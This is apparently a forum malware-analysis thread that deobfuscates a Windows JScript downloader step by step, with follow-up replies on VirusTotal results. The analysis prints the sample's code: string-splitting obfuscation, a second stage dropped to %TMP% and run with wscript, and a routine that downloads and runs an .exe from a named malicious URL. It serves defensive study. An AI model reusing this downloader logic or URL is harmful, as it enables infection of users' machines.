return new ActiveXObject(NLqcZ('WS&niOiBwhcg&cript&niOiBwhcg&.She&l&l',[0,2,4,5,6],'&'));

it works like this :

- split the string into several parts on the char '&'
- use the indices in the array to pick the parts that make up the decoded string
WS
niOiBwhcg
cript
niOiBwhcg
.She
l
l

=> new ActiveXObject("WScript.Shell")
The same way for :

new ActiveXObject("MSXML2.XMLHTTP")
new ActiveXObject("ADODB.Stream")​
Another method used : direct build

uyMW = 'G*RXeyIPlrFs*E*T*HITxpbjyJANk'.split('*'); => "GET"

Payload :

xgRqdfZ_<mFGoe>.exe, where mFGoe is a random integer returned by BllcCgi() (so the name changes on every run)

URL:

var KkUfF = ["http: //djprestige.net/111000/logs/logs.php"];

var AaWC = BllcCgi() % KkUfF.length; => to obfuscate a bit more : get a random valid index
var LARhtiaoV=KkUfF[AaWC]; => retrieve the URL at index AaWC
=> the URL that was used is then completely removed from the array of URLs
=> here: only one URL => on the next loop iteration, the script exits


=> LARhtiaoV = http://djprestige.net/111000/logs/logs.php


function nGQI(XKowap,LhcfAni){
try{
uyMW = 'G*RXeyIPlrFs*E*T*HITxpbjyJANk'.split('*'); => "GET"
LhcfAni.open(uyMW[0]+uyMW[2]+uyMW[3], XKowap, false);
LhcfAni.
setRequestHeader("User-Agent", "Python-urllib/3.1");
LhcfAni.
send();
}
catch(e){}
}

nGQI(LARhtiaoV,CDKBT);

if (CDKBT.status == 100+100) { => 200 : HTTP OK
var xvtZQuA = function() {
return new ActiveXObject(NLqcZ('ADO&DB&NhrHELmvq&.&DMIkBQbWW&Stream',[0,1,3,5],'&'));
}();
var fwGzkhGPhaog=NXbWm(xvtZQuA,CDKBT.
ResponseBody,SJQWojo);
}
try {
fFloYJxrMq(oidVjrlxN , SJQWojo); => run
var LxaYiEy = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\''+hUbTAlCkvX+'\\'');
if ( LxaYiEy.Count >= 1 ){
=> xgRqdfZ_<mFGoe>.exe already running?
break;
}
} catch(e) {}
UEMH++;
=> useless
KkUfF.splice (AaWC,460-459); => useless

3) When is this hidden part used?

All the functions and parts we have seen in section 2) end up in a variable, once decoded.

...
...
// The decoded second stage (blob elided).
var tQsqVjHOaCz = jnMWjogwsmcQ("kPgd2VvM2FOl09BdQdnlVTgu1NrnJ32N2F2wTeQhKFnvRVU313rXSV5319N74q2N2F2wTeQhKOIr098j4TOOQGBaV3riQGHjHkBuLRm7LG7mJS5CkPflJd8A2VU3Rsa84FEq0dQa1W2O0GIFSWIt23vsYEIp0sg30WEDRq8n1EElRTnA2FgBTT25AWYlR3YoXNvpSFYt1d85VdIKQtBsVUgKVFQ3XNY3XqYSQTgnRT5g4NE8SU8pYdUNRVQvRWUBQFYMPN2jQ3np1t2fVWQF2sgEPqO5TdrsTTEgTVgs0e29UVIqQEBr03IwUFUeTGUzYFauRNYdXd2t1TaWSqI8SGaMU3UqSdYdQEgh2V8EYVERUVrOTqvIAOYBTG25XT2rPqThKsOO2d2b2G2H1GgzUePfJSjazeY819BK
...............................
dQl0R7gJOUmXUgOTO8qKdnO0d2qAzNgbtroYWQr1du7AFaBTWHx6PqJYeUDXtQg0su7QdgMYT5q4OQqYFabQrPf4V2VTrOcAN8lYE2mQUPgHG5oYWQr1du70dUtH3EM2FOsYU8cXdgOXtPf4V2VTrOcAN8lYE2mQUPgbtqaz7==
");

This is what is called afterwards; you must remember the first decoded array:

TmOQLQMiKBSHZM :

"kVM"
"Scripting.FileSystemObject"
"WScript.Shell"
"dDhUJJXRFIby"
""
""
"rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
"*"
"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe *YDeCJLfTrlkAvu"
"*"
".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"
"*"
"run"

var aEDGtMwt = function() {

return new /*nzknJaFEhAKPCE*/ ActiveXObject(TmOQLQMiKBSHZM[1]); => "Scripting.FileSystemObject"
}();

var obWnumtlk = function() {

return WScript.CreateObject(TmOQLQMiKBSHZM[2]); => "WScript.Shell"
}();

EXPLANATIONS :

cJsHVL(aEDGtMwt, dbusESbAHhk(), tQsqVjHOaCz); => third parameter, the hidden part on the long string we have seen before !
function cJsHVL(UvzvIA, VjTGaiNuUBPgF, mqUyTKyNSmm) {
var TpMPzXgtwzTg = XkEZqeLzGdBEgB(UvzvIA, VjTGaiNuUBPgF);
TpMPzXgtwzTg.WriteLine(mqUyTKyNSmm);

TpMPzXgtwzTg.Close();
}
function XkEZqeLzGdBEgB(miETtK, QADeBTGed) {
return miETtK.createtextfile(QADeBTGed, true);
}

With :

- aEDGtMwt : File System Object
- dbusESbAHhk() : %TMP%\dDhUJJXRFIby.js (=> String.fromCharCode(92) : \ )
// Drop path: %TMP% + "\" + "dDhUJJXRFIby.js"
function dbusESbAHhk() {
return obWnumtlk.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'dDhUJJXRFIby.js'
}

In fact, the hidden part is written to a temp .js file: dDhUJJXRFIby.js :)

AfzFZ(obWnumtlk, MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM());

=>

(1) obWnumtlk :

var obWnumtlk = function() {
return WScript.CreateObject(TmOQLQMiKBSHZM[2]); => "WScript.Shell"
}();
(2) MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM() :

// Pieces 2, 4, 8, 10 of table entry [8] => "wscript.exe "
function MACECTYk() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[8], [2, 4, 8, 10], TmOQLQMiKBSHZM[9]);
}

=>"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe *YDeCJLfTrlkAvu"

=> Remember how they retrieve the real strings: an array of indices and a split char

"PoqenCjbNUOCtd*ZcAHzCdKaOITn*w*lqmOs*scrip*AlkhTmE*wxjsk*NpvTpRkvn*t.e*CsjMH*xe

=> "wscript.exe " (pieces 2, 4, 8 and 10: "w" + "scrip" + "t.e" + "xe ")
(with a blank char at the end)
// Expands omYcXJw() ("%TMP%") through the WScript.Shell object.
function vieag() {
return obWnumtlk.ExpandEnvironmentStrings(omYcXJw())
}

=>

// Pieces 1, 5, 7 of table entry [6] => "%TMP%"
function omYcXJw() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[6], [1, 5, 7], TmOQLQMiKBSHZM[7]);
}

=>

"rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"

=> "rJkPmHviSOtsKL*%T*TcDCPgOddyZrV*KXgTimAfZ*mnCHcusuyqfLQp*M*UXuarIJvx*P%*xlxdiqvK"
=> %TMP%

=> Expands environment-variable strings and replaces them with the values defined for the current user.

String.fromCharCode(92)

=> char : \
TmOQLQMiKBSHZM[3]

=> "dDhUJJXRFIby"
// Pieces 0, 3, 6 of table entry [10] => ".js"
function FhMKtMKvYiYM() {
return ZmDvKDROUbeY(TmOQLQMiKBSHZM[10], [0, 3, 6], TmOQLQMiKBSHZM[11]);
}

=> ".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"

=> ".*eIaYIYldRrHuT*GrvzT*j*BakthiR*CxrYlRq*s*bfChCjgqMNlT*iLeRZYVEahVuy"

=> ".js"
Conclusion :

AfzFZ(obWnumtlk, MACECTYk() + vieag() + String.fromCharCode(92) + TmOQLQMiKBSHZM[3] + FhMKtMKvYiYM());

Can be simplified :

shell.Run("command here");

"wscript.exe " + "%TMP%\" + "dDhUJJXRFIby.js"

Run the new js file : dDhUJJXRFIby.js

function AfzFZ(EOJUGdwva, upIslkONuZdKS) {
var zbqgCbCVWwkid = [TmOQLQMiKBSHZM[12]]; => in the famous first tab : "run"
EOJUGdwva[zbqgCbCVWwkid[0]]
(upIslkONuZdKS, 0x1, 0x0)
}

=> run(upIslkONuZdKS, 0x1, 0x0)
4) Summary :

This sample script :

- deobfuscates the real part, which was stored in a string variable encoded in a sort of Base64 (with a shuffled alphabet),
- writes this content on a new js file : dDhUJJXRFIby.js
- and runs it

dDhUJJXRFIby.js :

- downloads the payload : xgRqdfZ_<random number>.exe
- from http: //djprestige.net/111000/logs/logs.php
- runs it

5) Conclusion :

Many more parts could be analysed to show all the useless code written to make the script harder to understand. I won't detail more than the above; I think it was sufficient to understand the method used :)

If you have any question, I will be happy to answer
 

Solarquest


DardiM

@DardiM, thank you for the analysis.
Unfortunately the first part is still "chinese" for me, so thank you for the summary at the end! ;)
Interesting that vt=3 for

Code:
http: //djprestige.net/111000/logs/logs.php
https://www.virustotal.com/en/url/1...8f8918fb76754b45609a50727cade7c568a/analysis/
And vt=0 for the downloaded file....apparently VT doesn't manage to download the real file xgRqdfZmFGoe.exe
But only a .txt file.
In fact the most interesting part is where I show how to find the real content :oops:

The second part, which tries to download the payload from http : //djprestige.net/111000/logs/logs.php, now returns a 404 Not Found in the response. There is "Not Found [CFN #0005]" in the web page, built by the PHP side
=> it returns the web page you see, so content-type : text/html

content-length: 21

set-cookie: TS0194eee0=010bd780449280ab0c055aeba760108bb87a557eb50aed5c3f24a827165881d3936b5ff52b; Path=/
keep-alive: timeout=10, max=100
connection: Keep-Alive
date: Thu, 01 Sep 2016 15:36:28 GMT
content-type: text/html; charset=iso-8859-1


=> the malicious part has been removed
=> The link no longer works

I wonder whether it was a test for a future JS downloader.
We must follow how it evolves.

N.B.: Don't forget this is a static analysis: I only worked out and wrote up what it must do by looking at all the parts and deobfuscating them.
 
